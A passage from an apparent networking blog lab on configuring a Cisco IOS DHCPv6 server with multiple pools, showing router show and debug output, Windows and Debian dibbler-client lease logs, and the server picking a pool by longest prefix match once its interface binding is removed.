DHCPv6 pool: pool3

Address allocation prefix: 2001:DB8:3333::/64 valid 4294967295 preferred 4294967295 (1 in use, 0 conflicts)

DNS server: 2001:DB8:1203::1

Domain name: domain3.com


Active clients: 1

DHCPv6#

DHCPv6#sh ipv6 dhcp interface

FastEthernet0/0 is in server mode

Using pool: pool1

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet0/1 is in server mode

Using pool: pool2

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet1/0 is in server mode

Using pool: pool3

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

DHCPv6#

Windows Vista dibbler-client:

netsh interface ipv6>show address loopback0

Paramètres de l’adresse 2001:db8:3333:0:2537:afc2:4365:1370

———————————————————

LUID d’interface    : loopback0

ID d’étendue : 0.0

Durée de vie valide  : infinite

Durée de vie préférée : infinite

État DAD : Préféré

Type d’adresse : Dhcp

Paramètres de l’adresse fe80::f825:40a1:16dd:e757%12

———————————————————

LUID d’interface    : loopback0

ID d’étendue : 0.12

Durée de vie valide  : infinite

Durée de vie préférée : infinite

État DAD : Préféré

Type d’adresse : Autre

netsh interface ipv6>

Debian dibbler-Client:

user@debian:/etc/init.d$ sudo dibbler-client run
| Dibbler – a portable DHCPv6, version 0.7.3 (CLIENT, Linux port)

| Authors : Tomasz Mrugalski<thomson(at)klub.com.pl>,Marek Senderski<msend(at)o2.pl>

| Licence : GNU GPL v2 only. Developed at Gdansk University of Technology.

| Homepage: http://klub.com.pl/dhcpv6/


2011.12.23 17:08:48 Client Info Creating SOLICIT message with 1 IA(s), no TA and 0 PD(s) on eth1/3 interface.

2011.12.23 17:08:49 Client Info Received ADVERTISE on eth1/3,TransID=0xee14b2, 5 opts: 2 1 3 23 24

2011.12.23 17:08:50 Client Info Creating REQUEST. Backup server list contains 1 server(s).

2011.12.23 17:08:51 Client Info Received REPLY on eth1/3,TransID=0x201d85, 5 opts: 2 1 3 23 24

2011.12.23 17:08:51 Client Notice Address 2001:db8:2222:0:8d1b:4b3d:24e1:d21e/64 added to eth1/3 interface.

2011.12.23 17:08:51 Client Notice Setting up DNS server 2001:db8:1202::1 on interface eth1/3.

2011.12.23 17:08:51 Client Notice Setting up Domain domain2.com on interface eth1/3.

user@debian:~$ ping6 2001:db8:2222::1PING 2001:db8:2222::1(2001:db8:2222::1) 56 data bytes

64 bytes from 2001:db8:2222::1: icmp_seq=1 ttl=64 time=49.4 ms

64 bytes from 2001:db8:2222::1: icmp_seq=2 ttl=64 time=19.2 ms

64 bytes from 2001:db8:2222::1: icmp_seq=3 ttl=64 time=24.9 ms

^C

— 2001:db8:2222::1 ping statistics —

3 packets transmitted, 3 received, 0% packet loss, time 5010ms

rtt min/avg/max/mdev = 10.164/23.191/49.493/12.532 ms

user@debian:~$

One last thing, let’s remove the address pool from on interface and see if the server can find the appropriate pool based on the network where the client is connected

IOS DHCPv6 Server:

interface FastEthernet0/0
ipv6 address 2001:DB8:1111::1/64

ipv6 enable

ipv6 nd managed-config-flag


no ipv6 dhcp server pool1


ipv6 dhcp server automatic

Let’s verify the settings

DHCPv6#sh ipv6 dhcp interface

FastEthernet0/0 is in server mode

Using pool: pool1

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet0/1 is in server mode


Using pool:

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

FastEthernet1/0 is in server mode

Using pool: pool3

Preference value: 0

Hint from client: ignored

Rapid-Commit: disabled

DHCPv6#

No explicit binding of any pool to the interface fa0/1

user@debian:/etc/init.d$ sudo dibbler-client run

Re-run dibbler client

DHCPv6(config-if)#…

*Dec 30 04:55:57.391: IPv6 DHCP: Received REQUEST from FE80::A00:27FF:FE83:6B58 on FastEthernet0/1

*Dec 30 04:55:57.399: IPv6 DHCP: Matched prefix 2001:DB8:2222:: at length = 64

*Dec 30 04:55:57.399: IPv6 DHCP: Using longest match 2001:DB8:2222::/64 pool pool2 for incoming interface

*Dec 30 04:55:57.411: IPv6 DHCP: Updating binding address entry for address 2001:DB8:2222:0:559:1016:D88A:D520

*Dec 30 04:55:57.411: IPv6 DHCP: Sending REPLY to FE80::A00:27FF:FE83:6B58 on FastEthernet0/1

DHCPv6(config-if)#

The DHCPv6 server has found the longuest match of the interface IP address receiving the SOLLICIT with the pool “pool2”.

Debian dibbler-client

user@debian:/etc/init.d$ sudo dibbler-client run
| Dibbler – a portable DHCPv6, version 0.7.3 (CLIENT, Linux port)

| Authors : Tomasz Mrugalski<thomson(at)klub.com.pl>,Marek Senderski<msend(at)o2.pl>

| Licence : GNU GPL v2 only. Developed at Gdansk University of Technology.

| Homepage: http://klub.com.pl/dhcpv6/

2011.12.30 03:55:53 Client Info Creating SOLICIT message with 1 IA(s), no TA and 0 PD(s) on eth1/3 interface.

11.12.30 03:55:54 Client Info Received ADVERTISE on eth1/3,TransID=0x721ebd, 5 opts: 2 1 3 23 24

2011.12.30 03:55:55 Client Info Creating REQUEST. Backup server list contains 1 server(s).

2011.12.30 03:55:56 Client Info Received REPLY on eth1/3,TransID=0x4c8253, 5 opts: 2 1 3 23 24

2011.12.30 03:55:56 Client Notice Address 2001:db8:2222:0:559:1016:d88a:d520/64 added to eth1/3 interface.

2011.12.30 03:55:56 Client Notice Setting up DNS server 2001:db8:1202::1 on interface eth1/3.

2011.12.30 03:55:56 Client Notice Setting up Domain domain2.com on interface eth1/3.

References:
http://www.cisco.com/en/US/docs/ios/ipv6/configuration/guide/ip6-dhcp_ps6441_TSD_Products_Configuration_Guide_Chapter.html
http://blog.ioshints.info/2011/12/dhcpv6-server-on-cisco-ios-making.html
http://blog.ioshints.info/2011/10/ipv6-stateless-autoconfiguration-101.html
http://blog.ioshints.info/2011/10/do-i-need-ipv6-in-my-enterprise-again.html
http://blog.ioshints.info/2011/12/we-just-might-need-nat66.html
http://publib.boulder.ibm.com/infocenter/aix/v6r1/index.jsp?topic=%2Fcom.ibm.aix.commadmn%2Fdoc%2Fcommadmndita%2Ftcpip_dhcpv6_intro.htm
http://technet.microsoft.com/en-us/magazine/2007.08.cableguy.aspx
http://ipv6int.net/systems/cisco_ios_router-ipv6.html#dhcpv6

Automatic 6to4 mechanism


Here is a small animation explaining how automatic 6to4 works. For more details about the deployment please refer to this previous post.

(Note: clear your browser cache to update the latest animation)

%d bloggers like this: